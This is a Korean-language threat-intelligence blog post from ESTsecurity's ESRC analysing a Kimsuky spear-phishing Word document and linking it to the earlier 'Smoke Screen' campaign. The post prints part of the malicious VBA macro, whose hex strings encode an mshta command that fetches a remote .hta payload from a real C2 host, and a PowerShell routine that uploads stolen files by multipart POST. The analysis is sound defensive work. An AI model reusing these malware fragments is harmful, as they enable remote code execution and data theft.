







안녕하세요? 이스트시큐리티 ESRC(시큐리티대응센터) 입니다.





지난 02월 26일, '코로나 바이러스 관련 이사장님 지시사항'이라는 이메일 제목으로 악성 DOC MS-Word 문서가 첨부된 스피어 피싱(Spear Phishing) 공격이 포착되었고, 당시 이 공격은 '스모크 스크린(Smoke Screen)' APT(지능형지속위협) 캠페인의 일환으로 분석한 바 있습니다.





한편 2020년 03월 03일, 새로운 공격이 발견되었는데, '비건 미국무부 부장관 서신 20200302.doc' 파일명이 사용되었습니다.





ESRC는 해당 악성 문서 파일을 분석한 결과 기존 '스모크 스크린'과 동일한 APT 공격으로 조사를 완료했습니다.





스모크 스크린 사이버 위협에 적용된 전략, 기술, 절차(TTPs:Tactics, Techniques, Procedures) 등을 관찰한 결과 이들 배후에는 이른바 특정 정부기관의 지원을 받고 있는 일명 김수키(Kimsuky) 조직이 있는 것으로 확신되고 있습니다.





최근들어 이들은 HWP 취약점 문서보다 DOC Word 문서파일의 매크로 기능을 적극 활용하는 특징을 보이고 있습니다.





이번 공격에 사용된 DOC 악성 문서파일은 기존 '코로나바이러스 대응.doc' 파일과 동일하게 매크로 허용 유도 디자인을 그대로 재활용하였습니다.









[그림 1] DOC 문서 비교화면









각각의 악성 문서 파일은 마지막 수정 계정명이 'admin' 이름으로 동일하고, 공격에 사용된 매크로 코드 역시 유사성을 띄고 있습니다.







이용자가 보안 경고창으로 나타난 [콘텐츠 사용] 버튼을 클릭하게 되면, 다음과 같은 VBA 매크로 코드가 실행되어 악의적인 웹 사이트(C2)로 접속을 시도하게 됩니다.











- 일부 생략 -

.Solid End With Selection.WholeStory Content = ibgcqjqcesdb("6d7368746120687474703a2f2f6e68707572756d792e6d697265656e652e636f6d2f7468656d652f62617369632f736b696e") & ibgcqjqcesdb("2f6d656d6265722f62617369632f75706c6f61642f7365617263682e687461202f66") Selection.Font.Hidden = False bgdrkwewidjuilxpmyaz (Content) Selection.Collapse ActiveDocument.Save End Sub











이곳에 선언된 16진수 코드를 통해 공격자가 지정한 명령제어(C2) 호스트로 통신을 시도하게 됩니다.









[그림 2] C2 서버 주소 변환











코로나 바이러스 문서 내용으로 사용했던 공격과 비교해 C2 주소를 비교해 보면 두곳 모두 미리네 호스팅을 사용하였으며, 하위 주소 경로도 정확하게 일치합니다.





더불어 각각의 매크로 코드를 비교해 보아도 거의 동일한 형태로 제작된 것을 알 수 있습니다.









[그림 3] 매크로 코드 비교 화면











만약 악성 문서를 실행하고 [콘텐츠 사용] 버튼을 클릭할 경우에는 다음과 같은 문서 화면이 보여지게 됩니다.









[그림 4] 콘텐츠 사용할 경우 보여지는 문서 화면











공격자가 지정한 'search.hta' 코드가 작동하면 연쇄적으로 다른 파일을 호출하며, 감염된 컴퓨터의 다양한 정보들을 수집해 은밀히 탈취하게 됩니다.





또한, 추가 파일 다운로드 기능과 함께 사용자가 입력하는 키보드 내용을 저장해 유출하는 키로깅 스파이 기능도 수행하게 됩니다. 따라서 사용자의 중요한 개인정보가 유출되는 피해로 이어질 수 있게 됩니다.









$readText=[System.IO.File]::ReadAllText($Env:Appdata+$FPath);

$webClient=New-ObjectSystem.Net.WebClient; $webClient.Headers.Add("User-Agent","Mozilla/5.0compatible;MSIE10.0;WindowsNT6.1;WOW64;Trident/7.0"); $webClient.Headers.Add("Accept-Language","en-US,en;q=0.9"); $webClient.Headers.Add("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"); $webClient.Headers.Add("Content-Type","multipart/form-data;boundary=----7e222d1d50232");

$boundary="----7e222d1d50232"; $postData="--"+$boundary+"`r`nContent-Disposition:form-data;name=""MAX_FILE_SIZE""`r`n`r`n1000000`r`n--"+$boundary+"`r`nContent-Disposition:form-data;name=""file"";filename=""1.txt""`r`nContent-Type:text/plain`r`n`r`n"+$readText+"`r`n--"+$boundary+"--"; $reply=$webClient.UploadString([String]$URI,$postData); }









특히, 이곳에 사용된 바운더리 문자열 '7e222d1d50232' 값은 기존 김수키 코드에서도 여러차례 목격된 바 있습니다.









[그림 5] 김수키 조직의 다른 악성 파일 모습











정부차원의 APT 조직인 김수키(Kimsuky)는 한국을 포함해 다양한 나라를 상대로 위협을 지속하고 있습니다.





ESRC는 이들 조직이 최근 매우 활발하게 대남 사이버위협 활동을 하고 있는 점에 주목하고 있으며, DOC 워드 기반의 공격을 적극적으로 활용하는 점을 집중 분석하고 있는 중입니다.





알약에서는 해당 악성코드에 대해 Trojan.Downloader.DOC.Gen 등으로 탐지하고 있으며, 유사 위협에 사용된 도구와 침해지표(IoC) 등을 '쓰렛 인사이드(Threat Inside)' 위협 인텔리전스 리포트를 통해 제공할 계획입니다.















